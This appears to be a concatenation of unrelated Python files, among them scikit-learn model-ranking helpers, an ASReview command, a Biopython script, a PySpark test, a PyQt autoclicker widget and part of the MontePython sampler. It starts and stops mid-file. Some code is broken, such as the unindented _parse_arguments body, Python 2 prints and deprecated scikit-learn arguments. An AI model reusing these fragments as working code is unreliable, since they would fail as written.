    high to low) and redundancy with the other features (low to high).

    relevance formula: correlation with target class
    redundancy formula: sum of absolute value of correlation with other
    features / (number of features - 1)

    Parameters
    ----------
    x : pandas.DataFrame of candidate features
    y : pandas.Series target

    Returns
    -------
    pandas.DataFrame with one row per feature, sorted by correlation
    descending, ties broken by lower absolute dependency.
    """
    corr_matrix_abs = abs(x.corr())
    features = list(x.columns)
    # relevance: (signed) correlation of each feature with the target
    # NOTE(review): the column header says "absolute value" but the signed
    # correlation is used, as in the original — confirm intent
    corr = (x.astype(float)).corrwith(y.astype(float))
    # redundancy: mean |correlation| with the *other* features; the row sum
    # includes the self-correlation of 1, hence the -1 in the numerator.
    # bug fix: divide by the number of features; the original used
    # len(x.head()) which is a ROW count capped at 5, not the feature count
    depend = (corr_matrix_abs.sum(axis=1) - 1) / (len(features) - 1)
    ranked = sorted(zip(features, corr, depend),
                    key=lambda row: (row[1], -1 * abs(row[2])), reverse=True)
    output = pd.DataFrame(ranked, columns=['Feature', 'Correlation (absolute value high to low)', 'Dependency (low to high)'])
    return output
def optimalRegression(x_train, x_test, y_train, y_test):
    """Fit a battery of regression models, rank them by cross-validated
    mean absolute error, and return the two best.

    Returns
    -------
    (model1, name1, model2, name2)
        Best and second-best fitted models with their display names.
    """
    # cross-validated mean absolute error per model (NaN if the model fails)
    mean_absolute_errors = []
    # regression models
    models = [linear_model.LinearRegression(),
              linear_model.Ridge(fit_intercept=True, alpha=0.0, random_state=0, normalize=True),
              linear_model.Lasso(alpha = 0.1),
              linear_model.ElasticNet(),
              linear_model.Lars(n_nonzero_coefs=1),
              linear_model.LassoLars(),
              linear_model.OrthogonalMatchingPursuit(),
              linear_model.LogisticRegression(C=1.0, penalty='l1', tol=1e-6),
              linear_model.SGDRegressor(),
              MLPRegressor(solver='lbfgs'),
              linear_model.PassiveAggressiveRegressor(random_state=0),
              linear_model.RANSACRegressor(),
              linear_model.TheilSenRegressor(random_state=42),
              linear_model.HuberRegressor(fit_intercept=True, alpha=0.0, max_iter=100),
              Pipeline([
                  ('poly', PolynomialFeatures(degree=5, include_bias=False)),
                  ('linreg', linear_model.LinearRegression(normalize=True))
              ])]
    # display names, parallel to `models`
    names = ['Linear_Regression',
             'Ridge_Regression',
             'Lasso',
             'Elastic_Net',
             'Least_Angle_Regression',
             'LARS_Lasso',
             'Orthogonal_Matching_Pursuit',
             'Logistic_Regression',
             'Stochastic_Gradient_Descent',
             'Perceptron_Algorithms',
             'Passive-aggressive_Algorithms',
             'RANSAC',
             'Theil_SEN',
             'Huber_Regression',
             'Polynomial_Regression']
    for model in models:
        try:
            model.fit(x_train, y_train)
            predictions = cross_val_predict(model, x_test, y_test, cv=5)
            mean_absolute_errors.append(metrics.mean_absolute_error(y_test, predictions))
        except Exception:  # best-effort: a failing model is ranked last
            # bug fix: the original appended the string 'n/a', which made
            # sort_values crash on mixed str/float comparison whenever any
            # model failed; NaN sorts last instead
            mean_absolute_errors.append(np.nan)
    df = pd.DataFrame({'Model_reference': models,
                       'Model_name': names,
                       'Mean_absolute_err': mean_absolute_errors})
    df.sort_values(by='Mean_absolute_err', ascending=True, inplace=True)
    df = df.reset_index(drop=True)
    print(df[['Model_name','Mean_absolute_err']])
    print("Optimal model is " + str(df['Model_name'][0]) + " with error " + str(df['Mean_absolute_err'][0]))
    print("Second Optimal model is " + str(df['Model_name'][1]) + " with error " + str(df['Mean_absolute_err'][1]))
    name1 = str(df['Model_name'][0])
    name2 = str(df['Model_name'][1])
    model1 = None
    model2 = None
    # map the winning names back to the fitted model objects
    for model, name in zip(models, names):
        if name == name1:
            model1 = model
        elif name == name2:
            model2 = model
    return model1, name1, model2, name2
def optimalClassifier(x_train, x_test, y_train, y_test):
    """Fit a battery of classifiers, rank them by cross-validated accuracy,
    and return the two best.

    Returns
    -------
    (classifier1, name1, classifier2, name2)
        Best and second-best fitted classifiers with their display names.
    """
    classifiers = [DecisionTreeClassifier(random_state=0),
                   GaussianNB(),
                   SVC(),
                   AdaBoostClassifier(n_estimators=100),
                   GradientBoostingClassifier(n_estimators=100, learning_rate=1.0, max_depth=1, random_state=0),
                   LogisticRegression(random_state=1),
                   KNeighborsClassifier(n_neighbors=7),
                   RandomForestClassifier(n_estimators=10, max_depth=None, min_samples_split=2, random_state=0),
                   svm.SVC(kernel='linear', C = 1.0)]
    names = ['DecisionTree','Gaussian_NB','SK_learn','AdaBoost','Gradient_Boosting','Logistic_Regression','K_Nearest_Neighbors','Random_Forest','SVM']
    means = []
    for classifier in classifiers:
        try:
            classifier.fit(x_train, y_train)
            scores = cross_val_score(classifier, x_test, y_test, cv=5)
            means.append(scores.mean())
        # bug fix: was a bare `except:` which also swallowed
        # KeyboardInterrupt/SystemExit; a failing classifier scores 0
        except Exception:
            means.append(0)
    df = pd.DataFrame({'Classifier_reference': classifiers,
                       'Classifier_name': names,
                       'Score': means})
    df.sort_values(by='Score', ascending=False, inplace=True)
    df = df.reset_index(drop=True)
    print(df[['Classifier_name','Score']])
    print("Optimal classifier is " + str(df['Classifier_name'][0]) + " with score " + str(df['Score'][0]))
    print("Second Optimal classifier is " + str(df['Classifier_name'][1]) + " with score " + str(df['Score'][1]))
    name1 = str(df['Classifier_name'][0])
    name2 = str(df['Classifier_name'][1])
    classifier1 = None
    classifier2 = None
    # map the winning names back to the fitted classifier objects
    for classifier, name in zip(classifiers, names):
        if name == name1:
            classifier1 = classifier
        elif name == name2:
            classifier2 = classifier
    return classifier1, name1, classifier2, name2
# get the best number of features
def getBestK(x_train, x_test, y_train, y_test, classifier, name):
    """Search k = 1..n_features with SelectKBest, keeping the k whose
    cross-validated score on the test split is highest (ties broken by
    lower std), plot score vs. k, and return the selected feature names."""
    # Baseline: score with the full feature set.
    classifier.fit(x_train, y_train)
    scores = cross_val_score(classifier, x_test, y_test, cv=5)
    highest_score = np.mean(scores)
    std = np.std(scores)
    k_value = len(x_train.columns)# total number of features
    # list(df.head()) yields the column names, i.e. all features
    selected_features = list(x_train.head())
    means = []
    stds = []
    # get feature subset of all size
    # update best number of features
    for i in range(1, len(x_train.columns)+1):
        print("current number of features: " + str(i))
        select = SelectKBest(k=i)
        select.fit(x_train, y_train)
        x_train_selected = select.transform(x_train)
        # restrict the test split to the same selected columns
        cols = list(x_train.columns[select.get_support(indices=True)])
        x_test_selected = x_test[cols]
        classifier.fit(x_train_selected, y_train)
        scores = cross_val_score(classifier, x_test_selected, y_test, cv=5)
        # prefer a higher mean score; on equal means prefer lower variance
        if np.mean(scores) > highest_score or (np.mean(scores) == highest_score and np.std(scores) < std):
            highest_score = np.mean(scores)
            std = np.std(scores)
            k_value = i
            selected_features = cols
        means.append(np.mean(scores))
        stds.append(np.std(scores))
    print("Number of features: " + str(k_value) + ", accuracy score " + str(highest_score))
    print("The selected features are: \n" + str(pd.DataFrame({'Feature':selected_features})))
    x_axis = np.array(range(1, len(x_train.columns)+1))
    means = np.array(means)
    stds = np.array(stds)
    # plot number of features vs. cross validation score with standard deviation shading
    plt.figure()
    plt.title("Number of features vs. Cross Val Score (" + name + ")")
    plt.xlabel("Number of features selected")
    plt.ylabel("Cross validation score of number of selected features")
    plt.plot(x_axis, means, 'o-', color='g')
    plt.fill_between(x_axis, means + stds, means - stds, alpha=0.15, color='g')
    plt.show()
    return selected_features
# univariance feature selection
def univariance(x, y, k_value):
    """Univariate feature scoring with SelectKBest.

    Clamps ``k_value`` to the number of available columns, then returns a
    DataFrame of the ``k_value`` highest-scoring features (columns
    'Feature' and 'Score').
    """
    n_cols = len(x.columns)
    if k_value > n_cols:
        print("There are only " + str(n_cols) + " features, change k to " + str(n_cols) + "...")
        k_value = n_cols
    fit = SelectKBest(k=k_value).fit(x, y)
    table = pd.concat(
        [pd.DataFrame(x.columns), pd.DataFrame(fit.scores_)], axis=1)
    table.columns = ['Feature', 'Score']
    print("Number of Features: " + str(k_value))
    return table.nlargest(k_value, 'Score')
# Recursive Feature Elimination
def RFEFeatSelect(x, y, classifier):
    """Recursive Feature Elimination with cross-validation (RFECV).

    Uses a larger elimination step (~1% of the columns) on wide inputs to
    keep the search tractable, plots CV score vs. number of features, and
    returns the selected column names.

    Returns
    -------
    pandas.DataFrame with a 'Feature' column, or an empty frame
    (columns=['Empty']) if RFECV raises a RuntimeError.
    """
    try:
        step_value = 1
        if len(x.columns) > 500:
            step_value = int(round(len(x.columns)/100))
        rfe = RFECV(estimator=classifier, step=step_value, scoring='accuracy')
        fit = rfe.fit(x, y)
        # Bug fix: the loop variable was previously named `bool`, shadowing
        # the builtin; use a descriptive name and a comprehension instead.
        feature_selected = [feature for keep, feature
                            in zip(fit.support_, list(x)) if keep]
        print("Number of Features: " + str(fit.n_features_))
        # plot number of features vs. cross validation score
        # NOTE(review): `grid_scores_` was removed in scikit-learn 1.2 in
        # favour of `cv_results_` — confirm the pinned sklearn version.
        plt.figure()
        plt.title("(RFE) Number of feature vs. Cross Validation Score")
        plt.xlabel("Number of features selected")
        plt.ylabel("Cross validation score of number of selected features")
        plt.plot(range(1, len(rfe.grid_scores_) + 1), rfe.grid_scores_)
        plt.show()
        return pd.DataFrame({"Feature": feature_selected})
    except RuntimeError:
        print(sys.exc_info())
        return pd.DataFrame(columns=['Empty'])
# select from model using classifier
def modelFeatSelect(x, y, classifier, k_value):
    """Select at most ``k_value`` features with SelectFromModel.

    Starts at an importance threshold of 0.1 and raises it in 0.05 steps
    until no more than ``k_value`` features survive.

    Returns
    -------
    pandas.DataFrame with a 'Feature' column of the kept names, or an
    empty frame (columns=['Empty']) if fitting fails with a ValueError.
    """
    try:
        sfm = SelectFromModel(classifier, threshold=0.1)
        sfm.fit(x, y)
        n_features = sfm.transform(x).shape[1]
        # Tighten the threshold until the surviving count fits the cap.
        while n_features > k_value:
            sfm.threshold += 0.05
            n_features = sfm.transform(x).shape[1]
        index = sfm.get_support()
        features = pd.DataFrame({"Feature": x.columns[index]})
        # Bug fix: report the number of features actually kept; the old
        # code printed the requested cap `k_value` even when fewer (or,
        # initially, more was never the case) features survived.
        print("Number of Features: " + str(len(features)))
        return features
    except ValueError:
        print(sys.exc_info())
        return pd.DataFrame(columns=['Empty'])
from argparse import ArgumentParser
from asreview import ASReviewData
from asreview.analysis import Analysis
from asreview.entry_points.base import BaseEntryPoint
class DifficultEntryPoint(BaseEntryPoint):
    """ASReview entry point that prints the records hardest to discover."""

    description = "Show the most difficult records."

    def __init__(self):
        super(DifficultEntryPoint, self).__init__()
        from asreviewcontrib.pro.__init__ import __version__
        from asreviewcontrib.pro.__init__ import __extension_name__
        self.version = __version__
        self.extension_name = __extension_name__

    def execute(self, argv):
        """Parse *argv* and print the top-N records together with their
        average time-to-discovery percentage."""
        args = vars(_parse_arguments().parse_args(argv))
        as_data = ASReviewData.from_file(args["data_path"])
        order, ttd = self.find_order(args["state_path"])
        for key in order[:args["top"]]:
            print(f"{ttd[key]:.2f} %")
            as_data.print_record(key)

    def find_order(self, state_path):
        """Return (keys sorted by descending avg time-to-discovery, ttd map)."""
        analysis = Analysis.from_path(state_path)
        ttd = analysis.avg_time_to_discovery(result_format="percentage")
        analysis.close()
        ranked = sorted(ttd, key=lambda key: -ttd[key])
        return ranked, ttd
def _parse_arguments():
parser = ArgumentParser(prog="asreview difficult")
parser.add_argument(
'state_path',
type=str,
help="Path to state/log file to analyze."
)
parser.add_argument(
'data_path',
type=str,
help="Path to data file corresponding to the state file."
)
parser.add_argument(
"-n", "--top",
type=int,
default=3,
help="Determines how many entries are shown."
)
return parser
|
import string
from Bio.Seq import Seq
from Bio import SeqIO
# FASTA input files used by the script below.  Absolute, machine-specific
# paths — adjust for your environment.
filepath = "/home/prokriti/HumanALDH2.fasta"
filepath1 = "/home/prokriti/MutatedHumanALDH2.fasta"
filepath2 = "/home/prokriti/mutatedgreenopsin.fasta"
filepath3 = "/home/prokriti/greenopsin.fasta"
def read(filepath: str):
    """Return the sequence of the last record in a FASTA file.

    The previous implementation looped over every record only to keep the
    last one's sequence, and raised an opaque NameError when the file had
    no records; an empty file now raises ValueError instead.
    """
    reads = list(SeqIO.parse(filepath, "fasta"))
    if not reads:
        raise ValueError("no FASTA records found in " + filepath)
    return reads[-1].seq
def protein(s):
    """Transcribe the DNA sequence *s* to mRNA, then translate to protein."""
    mrna = s.transcribe()
    return mrna.translate()
# Earlier ALDH2 (Asian flush) comparison, kept for reference but disabled.
#a = read(filepath)
#b = read(filepath1)
#c = protein(a)
#d = protein(b)
#print("Non Asian Flush")
#print(c)
#print("Asian Flush")
#print(d)
# Translate the green opsin sequences (mutated and wild type) and print
# them as FASTA-style records on stdout.
r1 = read(filepath2)
r2 = read(filepath3)
p1 = protein(r1)
p2 = protein(r2)
print(">HumanGreenOpsin")
print(p2)
print(">MutatedGreenOpsin")
print(p1)
|
import unittest
from pyspark.sql.tests import ReusedSQLTestCase
class TreeReduceTestCase(ReusedSQLTestCase):
    """Check that RDD.treeReduce matches plain reduce at several tree depths."""

    def test_treereduce(self):
        words = ["Settlements", "some", "centuries", "old", "and", "still",
                 "no", "bigger", "than", "pinheads", "on", "the", "untouched",
                 "expanse", "of", "their", "background"]
        lengths = self.spark.sparkContext.parallelize(words).map(len)

        def add(left, right):
            return left + right

        baseline = lengths.reduce(add)
        for depth in (1, 2, 3):
            # 93 is the total character count of the word list above.
            self.assertEqual(lengths.treeReduce(add, depth), 93)
            self.assertEqual(lengths.treeReduce(add, depth), baseline)
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
|
# Read an upper bound N from stdin, then for each i in 1..N print two rows:
# (i, i^2, i^3) followed by the same powers each shifted up by one.
limit = int(input())
for i in range(1, limit + 1):
    print(i, i ** 2, i ** 3)
    print(i, i ** 2 + 1, i ** 3 + 1)
|
from setuptools import setup
import os
import torch
import sysconfig
from torch.utils.cpp_extension import BuildExtension, CppExtension, CUDAExtension
# Toggle to build the CUDA extension with debug symbols and no optimization.
_DEBUG = False
_DEBUG_LEVEL = 0
# extra_compile_args = []
# extra_compile_args = sysconfig.get_config_var('CFLAGS').split()
# extra_compile_args.remove('-DNDEBUG')
# extra_compile_args.remove('-O3')
if(_DEBUG):
    # Debug build: keep symbols, disable optimization, expose DEBUG level.
    # NOTE(review): this branch passes a flat list, while the release branch
    # below passes a {'cxx': ..., 'nvcc': ...} dict — confirm both forms are
    # accepted by the torch build you target.
    extra_compile_args = ['-g', '-O0', '-lineinfo', '-DDEBUG=%s' % _DEBUG_LEVEL, '-UNDEBUG']
else:
    # extra_compile_args += ['-g', '-O3', '-DNDEBUG']
    # Release build: separate flag sets for the host C++ compiler and nvcc.
    extra_compile_args = {'cxx': ['-g'], 'nvcc': ['-O2']}
print(extra_compile_args)
# Build the zbuffertri_batch CUDA extension from one C++ and one .cu source.
setup(
    name="zbuffertri_batch",
    version="1.0.0",
    ext_modules=[
        CUDAExtension(
            "zbuffertri_batch",
            ["zbuffertri.cpp", "zbuffertri_implementation.cu"],
            extra_compile_args=extra_compile_args
            # include_dirs=include_dirs
        )
    ],
    cmdclass={"build_ext": BuildExtension},
)
# .with_options(no_python_abi_suffix=True)
|
# ============================================================================
# FILE: deol.py
# AUTHOR: Shougo Matsushita <Shougo.Matsu at gmail.com>
# License: MIT license
# ============================================================================
from denite.source.base import Base
from denite.kind.base import Base as BaseK
import denite.util
class Source(Base):
    """Denite source listing the deol terminal of every tab page."""

    def __init__(self, vim):
        super().__init__(vim)
        self.name = 'deol'
        self.kind = Kind(vim)

    def gather_candidates(self, context):
        """Build one candidate per tab, flagged with whether deol runs there."""
        args = context['args']
        command = args[0] if args else ''
        last_tab = self.vim.call('tabpagenr', '$')
        result = []
        for tabnr in range(1, last_tab + 1):
            deol = self.vim.call('gettabvar', tabnr, 'deol', {})
            if deol:
                word = '{}: {} ({})'.format(tabnr, deol['command'], deol['cwd'])
            else:
                word = '{}: [new denite]'.format(tabnr)
            result.append({
                'word': word,
                'action__command': command,
                'action__tabnr': tabnr,
                'action__is_deol': bool(deol),
            })
        return result
class Kind(BaseK):
    """Denite kind implementing actions on deol tab pages."""

    def __init__(self, vim):
        super().__init__(vim)
        self.name = 'deol'
        self.default_action = 'switch'
        # 'delete' both redraws the candidate list and keeps denite open.
        self.redraw_actions += ['delete']
        self.persist_actions += ['delete']

    def action_switch(self, context):
        """Jump to the target tab; start deol there if none is running."""
        target = context['targets'][0]
        self.vim.command(f"tabnext {target['action__tabnr']}")
        if not target['action__is_deol']:
            self.vim.command(f"Deol {target['action__command']}")

    def action_new(self, context):
        """Open a fresh deol in the target tab, inheriting its options."""
        target = context['targets'][0]
        if not target['action__is_deol']:
            return
        self.vim.command(f"tabnext {target['action__tabnr']}")
        deol = self.vim.call('gettabvar',
                             target['action__tabnr'], 'deol')
        options = {'start_insert': deol['options']['start_insert']}
        if target['action__command']:
            options['command'] = target['action__command']
        self.vim.call('deol#new', options)

    def action_delete(self, context):
        """Close the selected tabs, never the currently active one."""
        # Bug fix: the original reused the name `tabnr` both for the
        # current tab and as the loop variable, shadowing the former.  It
        # happened to work only because the comprehension is evaluated
        # before the loop rebinds the name; use distinct names instead.
        current_tabnr = self.vim.call('tabpagenr')
        doomed = sorted(x['action__tabnr'] for x in context['targets']
                        if x['action__tabnr'] != current_tabnr)
        # Close from the highest tab number down so earlier closes do not
        # renumber the tabs still pending.
        for tabnr in reversed(doomed):
            self.vim.command(f'silent! {tabnr} tabclose')

    def action_edit(self, context):
        """Prompt for a new cwd for the target deol, creating it on demand."""
        target = context['targets'][0]
        if not target['action__is_deol']:
            return
        deol = self.vim.call('gettabvar',
                             target['action__tabnr'], 'deol')
        cwd = str(self.vim.call(
            'denite#util#input',
            'New deol cwd: ', deol['cwd'], 'dir'
        ))
        self.vim.command('redraw')
        if cwd == '':
            return
        if self.vim.call('filereadable', cwd):
            denite.util.error(self.vim, f'{cwd} is not directory.')
            return
        if not self.vim.call('isdirectory', cwd):
            result = self.vim.call(
                'confirm',
                f"[deol] {cwd} is not directory. Create?",
                "&Yes\n&No\n&Cancel")
            if result != 1:
                return
            self.vim.call('mkdir', cwd, 'p')
        self.vim.command(f"tabnext {target['action__tabnr']}")
        # Move to deol buffer
        self.vim.call('deol#start', '')
        self.vim.call('deol#cd', cwd)
|
from lib.autoclicker.logger import get_logger
from PyQt6.QtWidgets import QHBoxLayout, QPushButton, QRadioButton, QLineEdit, QGroupBox
from PyQt6.QtGui import QIntValidator
from PyQt6.QtCore import pyqtSignal
from pynput.mouse import Button, Listener as mouseListener
Logger = get_logger(__name__)
class cursor_location(QGroupBox):
    """Group box letting the user click at the mouse's current position or
    at a specific (x, y) screen coordinate.

    Signals
    -------
    useCurrentLocation(bool)
        True when "Current Location" is selected, False for "Specific".
    currentLocation(int, int)
        Emitted with (x, y) whenever either coordinate field changes.
    """
    useCurrentLocation = pyqtSignal(bool)
    currentLocation = pyqtSignal(int, int)
    def __init__(self, parent):
        super().__init__(parent)
        self.setTitle("Cursor Location")
        try:
            # Create Cursor Location Layout
            layout = QHBoxLayout()
            # Set Cursor Location Layout as layout for Cursor location frame
            self.setLayout(layout)
            # Create Current location radio button
            CurrentLocation = QRadioButton("Current Location")
            CurrentLocation.setObjectName("current_location")
            # NOTE(review): `clicked` fires even when the already-checked
            # radio is clicked again, which would re-toggle the enabled
            # states out of sync — confirm this is acceptable.
            CurrentLocation.clicked.connect(self.ToggleSpecifcLocation)
            CurrentLocation.clicked.connect(lambda: self.useCurrentLocation.emit(True))
            CurrentLocation.setChecked(True)
            # Create Specific location radio button
            specific_location = QRadioButton("Specific Location")
            specific_location.clicked.connect(self.ToggleSpecifcLocation)
            specific_location.clicked.connect(
                lambda: self.useCurrentLocation.emit(False)
            )
            # Create Select Specific Location Button
            SelectLocation = QPushButton("Select Location")
            SelectLocation.setObjectName("select_location")
            SelectLocation.clicked.connect(self.getLocation)
            SelectLocation.setEnabled(False)
            # Restrict both coordinate fields to non-negative 4-digit ints.
            validator = QIntValidator(0, 9999, self)
            # Create X cordinate spot
            x_cordinate = QLineEdit()
            x_cordinate.setObjectName("x_cordinate")
            x_cordinate.setEnabled(False)
            x_cordinate.setText("0")
            x_cordinate.setValidator(validator)
            x_cordinate.textChanged.connect(
                lambda: self.currentLocation.emit(self.get_X_Cord(), self.get_Y_Cord())
            )
            # Create Y cordinate spot
            y_cordinate = QLineEdit()
            y_cordinate.setObjectName("y_cordinate")
            y_cordinate.setEnabled(False)
            y_cordinate.setText("0")
            y_cordinate.setValidator(validator)
            y_cordinate.textChanged.connect(
                lambda: self.currentLocation.emit(self.get_X_Cord(), self.get_Y_Cord())
            )
            # Load all widgets
            layout.addWidget(CurrentLocation)
            layout.addWidget(specific_location)
            layout.addWidget(x_cordinate)
            layout.addWidget(y_cordinate)
            layout.addWidget(SelectLocation)
        except Exception as e:
            Logger.error(e)
            Logger.error("failed to initialize cursor location section")
        else:
            Logger.info("successfully initialized cursor location section")
    def ToggleSpecifcLocation(self):
        """Flip the enabled state of the x/y fields and the select button."""
        x_cordinate = self.findChild(QLineEdit, "x_cordinate")
        x_cordinate.setEnabled(not x_cordinate.isEnabled())
        y_cordinate = self.findChild(QLineEdit, "y_cordinate")
        y_cordinate.setEnabled(not y_cordinate.isEnabled())
        select_location = self.findChild(QPushButton, "select_location")
        select_location.setEnabled(not select_location.isEnabled())
    def get_X_Cord(self) -> int:
        """Current value of the x field as an int."""
        return int(self.findChild(QLineEdit, "x_cordinate").text())
    def get_Y_Cord(self) -> int:
        """Current value of the y field as an int."""
        return int(self.findChild(QLineEdit, "y_cordinate").text())
    def getLocation(self) -> None:
        """Start a global mouse listener; fields track the pointer until the
        next left click fixes the coordinates and stops the listener."""
        try:
            def on_click(x, y, button: Button, pressed: bool):
                if pressed and button == Button.left:
                    self.update_cordinates(str(x), str(y))
                    self.listener.stop()
            def on_move(x, y):
                self.update_cordinates(str(x), str(y))
            self.listener = mouseListener(on_move=on_move, on_click=on_click)
            self.listener.start()
        except Exception as e:
            Logger.error(e)
    def update_cordinates(self, X: str, Y: str) -> None:
        """Write the given coordinate strings into the x/y fields."""
        try:
            self.findChild(QLineEdit, "x_cordinate").setText(X)
            self.findChild(QLineEdit, "y_cordinate").setText(Y)
        except Exception as e:
            Logger.error(e)
|
"""
.. module:: sampler
:synopsis: Generic sampler
.. moduleauthor:: Benjamin Audren <benjamin.audren@epfl.ch>
.. moduleauthor:: Surhudm More <>
This module defines one key function, :func:`run`, that distributes the work to
the desired actual sampler (Metropolis Hastings, or Nested Sampling so far).
It also defines a series of helper functions, that aim to be generically used by
all different sampler methods:
* :func:`get_covariance_matrix`
* :func:`read_args_from_chain`
* :func:`read_args_from_bestfit`
* :func:`accept_step`
* :func:`compute_lkl`
"""
import numpy as np
import sys
import warnings
import io_mp
import os
def run(cosmo, data, command_line):
    """
    Depending on the choice of sampler, dispatch the appropriate information
    The :mod:`mcmc` module is used as previously, except the call to
    :func:`mcmc.chain`, or :func:`nested_sampling.run` is now within
    this function, instead of from within :mod:`MontePython`.
    In the long term, this function should contain any potential hybrid scheme.
    """
    method = command_line.method
    # Each branch imports its sampler lazily so that only the requested
    # backend (and its dependencies) is loaded.
    if method == 'MH':
        import mcmc
        mcmc.chain(cosmo, data, command_line)
        data.out.close()
        return
    if method == 'NS':
        import nested_sampling as ns
        ns.run(cosmo, data, command_line)
        return
    if method == 'CH':
        import cosmo_hammer as hammer
        hammer.run(cosmo, data, command_line)
        return
    if method == 'IS':
        import importance_sampling as ims
        ims.run(cosmo, data, command_line)
        return
    if method == 'Der':
        import add_derived as der
        der.run(cosmo, data, command_line)
        return
    raise io_mp.ConfigurationError(
        "Sampling method %s not understood" % method)
def read_args_from_chain(data, chain):
    """
    Pick up the last accepted values from an input chain as a starting point
    Function used only when the restart flag is set. It will simply read the
    last line of an input chain, using the tail command from the extended
    :class:`io_mp.File` class.
    .. warning::
        That method was not tested since the adding of derived parameters. The
        method :func:`read_args_from_bestfit` is the prefered one.
    .. warning::
        This method works because of the particular presentation of the chain,
        and the use of tabbings (not spaces). Please keep this in mind if you
        are having difficulties
    Parameters
    ----------
    chain : str
        Name of the input chain provided with the command line.
    """
    chain_file = io_mp.File(chain, 'r')
    parameter_names = data.get_mcmc_parameters(['varying'])
    # Perf fix: tail the file once instead of re-reading the last line for
    # every single parameter as the previous implementation did.
    last_point = chain_file.tail(1)[0].split('\t')
    # Parameter columns start at index 1 (column 0 is skipped, matching the
    # original indexing).
    for i, elem in enumerate(parameter_names, start=1):
        data.mcmc_parameters[elem]['last_accepted'] = float(last_point[i])
def read_args_from_bestfit(data, bestfit):
    """
    Deduce the starting point either from the input file, or from a best fit
    file.
    Parameters
    ----------
    bestfit : str
        Name of the bestfit file from the command line.
    """
    parameter_names = data.get_mcmc_parameters(['varying'])
    # NOTE(review): the file handle is never closed.
    bestfit_file = open(bestfit, 'r')
    for line in bestfit_file:
        # Header line '#name1,name2,...' gives the parameter ordering.
        # Assumes the header precedes the value line, otherwise
        # `bestfit_values` below would be undefined — TODO confirm format.
        if line.find('#') != -1:
            bestfit_names = line.strip('#').replace(' ', '').\
                replace('\n', '').split(',')
            bestfit_values = np.zeros(len(bestfit_names), 'float64')
        else:
            line = line.split()
            for i in range(len(line)):
                bestfit_values[i] = line[i]
    # Python 2 print statements below (bare `print` emits an empty line);
    # this module predates Python 3.
    print
    print('\nStarting point for rescaled parameters:')
    for elem in parameter_names:
        if elem in bestfit_names:
            # Undo the parameter's scale factor before storing it.
            data.mcmc_parameters[elem]['last_accepted'] = \
                bestfit_values[bestfit_names.index(elem)] / \
                data.mcmc_parameters[elem]['scale']
            print 'from best-fit file : ', elem, ' = ',
            print bestfit_values[bestfit_names.index(elem)] / \
                data.mcmc_parameters[elem]['scale']
        else:
            # Parameter absent from the best-fit file: fall back to the
            # central value from the input parameter file.
            data.mcmc_parameters[elem]['last_accepted'] = \
                data.mcmc_parameters[elem]['initial'][0]
            print 'from input file : ', elem, ' = ',
            print data.mcmc_parameters[elem]['initial'][0]
def get_covariance_matrix(cosmo, data, command_line):
    """
    Compute the covariance matrix, from an input file or from an existing
    matrix.
    Reordering of the names and scaling take place here, in a series of
    potentially hard to read methods. For the sake of clarity, and to avoid
    confusions, the code will, by default, print out a succession of 4
    covariance matrices at the beginning of the run, if starting from an
    existing one. This way, you can control that the parameters are set
    properly.
    .. note::
        The set of parameters from the run need not to be the exact same
        set of parameters from the existing covariance matrix (not even the
        ordering). Missing parameter from the existing covariance matrix will
        use the sigma given as an input.
    """
    # Setting numpy options in terms of precision (useful when writing to files
    # or displaying a result, but does not affect the precision of the
    # computation).
    np.set_printoptions(precision=2, linewidth=150)
    parameter_names = data.get_mcmc_parameters(['varying'])
    # Define quiet setting if not previously defined
    # NOTE(review): bare `except` also swallows KeyboardInterrupt/SystemExit;
    # `except AttributeError` would be the targeted form.
    try:
        command_line.quiet
    except:
        command_line.quiet = False
    if command_line.fisher and not command_line.cov:
        # We will work out the fisher matrix for all the parameters and
        # write it to a file
        if not command_line.silent:
            warnings.warn("Fisher implementation is being tested")
        # Let us create a separate copy of data
        from copy import deepcopy
        # Do not modify data, instead copy
        temp_data = deepcopy(data)
        done = False
        # Create the center dictionary, which will hold the center point
        # information (or best-fit) TODO
        # This dictionary will be updated in case it was too far from the
        # best-fit, and found a non positive-definite symmetric fisher matrix.
        center = {}
        if not command_line.bf:
            for elem in parameter_names:
                temp_data.mcmc_parameters[elem]['current'] = (
                    data.mcmc_parameters[elem]['initial'][0])
                center[elem] = data.mcmc_parameters[elem]['initial'][0]
        else:
            read_args_from_bestfit(temp_data, command_line.bf)
            for elem in parameter_names:
                temp_data.mcmc_parameters[elem]['current'] = (
                    temp_data.mcmc_parameters[elem]['last_accepted'])
                center[elem] = temp_data.mcmc_parameters[elem]['last_accepted']
        # Have a security index that prevents looping indefinitely
        security = 0
        while not done and security < 10:
            security += 1
            # Compute the Fisher matrix and the gradient array at the center
            # point.
            fisher_matrix, gradient = compute_fisher(
                temp_data, cosmo, center, 0.01)
            # Compute inverse of the fisher matrix, catch LinAlgError exception
            fisher_invert_success = True
            try:
                if not command_line.silent:
                    print("Fisher matrix computed:")
                    print(fisher_matrix)
                cov_matrix = np.linalg.inv(fisher_matrix)
            except np.linalg.LinAlgError:
                raise io_mp.ConfigurationError(
                    "Could not find Fisher matrix, please remove the "
                    "option --fisher and run with Metropolis-Hastings "
                    "or another sampling method.")
                # NOTE(review): the two statements below are unreachable —
                # the raise above always exits this handler first.
                fisher_invert_success = False
                done = True
            # Write it to the file
            if fisher_invert_success:
                io_mp.write_covariance_matrix(
                    cov_matrix, parameter_names,
                    os.path.join(command_line.folder, 'covariance_fisher.mat'))
                command_line.cov = os.path.join(
                    command_line.folder, 'covariance_fisher.mat')
                done = True
                # Check if the diagonal elements are non-negative
                for h, elem in enumerate(parameter_names):
                    if cov_matrix[h][h] < 0:
                        warnings.warn(
                            "Covariance has negative values on diagonal, "
                            "moving to a better point and repeating "
                            "the Fisher computation")
                        done = False
                        break
                if not done:
                    # Solve for a step
                    step = np.dot(cov_matrix, gradient)
                    # Now modify data_parameters TODO HERE update center
                    for k, elem in enumerate(parameter_names):
                        data.mcmc_parameters[elem]['initial'][0] = data.mcmc_parameters[elem]['initial'][0]-step[k]
                        temp_data.mcmc_parameters[elem]['initial'][0] = temp_data.mcmc_parameters[elem]['initial'][0]-step[k]
                        # Python 2 print statement; this module predates Python 3.
                        print "Moved %s to:"%(elem),data.mcmc_parameters[elem]['initial'][0]
    # if the user provides a .covmat file or if user asks to compute a fisher matrix
    if command_line.cov is not None:
        # Read the raw matrix, whose first '#' line holds the ordered,
        # comma-separated parameter names.
        cov = open('{0}'.format(command_line.cov), 'r')
        i = 0
        for line in cov:
            if line.find('#') != -1:
                # Extract the names from the first line
